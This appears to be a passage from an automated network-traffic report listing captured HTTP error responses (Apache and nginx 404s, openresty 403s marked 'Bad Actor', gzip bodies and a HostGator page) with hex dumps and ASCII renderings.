                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:31:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:31:31 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Tue, 12 Nov 2024 14:31:36 GMTcontent-type: text/htmlcontent-length: 577x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:12 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:32:20 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:01:30 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 12 Nov 2024 14:33:36 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66f0ea70-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 12 Nov 2024 14:33:42 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 178Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00 Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b
